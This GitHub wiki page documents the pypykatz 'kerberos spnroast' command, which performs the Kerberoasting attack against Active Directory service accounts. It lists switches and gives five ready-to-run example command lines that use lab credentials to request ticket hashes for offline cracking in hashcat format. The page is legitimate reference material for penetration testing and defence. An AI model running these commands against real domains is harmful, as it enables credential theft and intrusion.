Skip to content

Kerberos spnroast command

Jump to bottom
skelsec edited this page Apr 15, 2021 · 3 revisions

What it does

Performs the SPNroast (aka kerberoast) attack against a list of users

Remarks

The list of users can be in a file (one username per line) or can be set in a command line argument (at the end of the command). You may even mix the two.
Important: The expected format is <user>@<realm> but you don't need to specify the target users using this format if you with, just the username is enough IF you also supply the -d <realm> switch.

Requirements

You will need the following things:

  • Credentials of the user. This credential can be the password or NT hash or secret key RC4/AES128/AES256
  • A list of usernames prone to spnroast attack
  • Instead of targets and realm you can use LDAP connection string to load the targets automatically

Subcommands

None

Switches

  • -o: Writes the result to a file
  • -d: Realm aka domain name
  • -e: Specifies which encryption type should be requested. Default is RC4 (23)
  • -t or --targets: Targets to be loaded from file or as SPN string, or just username if -d is set.
  • -l or --ldap: LDAP URL in ConnectionURL format. This will fetch the targets from the DC via LDAP.
  • url : Kerberos URL in ConnectionURL format.

Examples

  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -t srv_http@test.corp: Performs the kerberoast attack against user srv_http@test.corp. Output will be printed to console in hashcat format
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -d test.corp -t srv_http: Same as above but this time the username and realm was specified separately
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -d test.corp -t vulnerable_users.txt: Same as above but the target users are fetched from the vulnerable_users.txt file
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -e 18 srv_http@test.corp: Same as the first command but the encryption type is changed to AES256. (just an example, dont do this)
  • pypykatz kerberos spnroast 'kerberos+password://TEST\victim:Passw0rd!1@10.10.10.2' -l 'ldap+ntlm-password://TEST\victim:Passw0rd!1@10.10.10.2' : sproast against targets loaded via LDAP

Home

Live commands

Platform-independent commands

ConnectionURL

Clone this wiki locally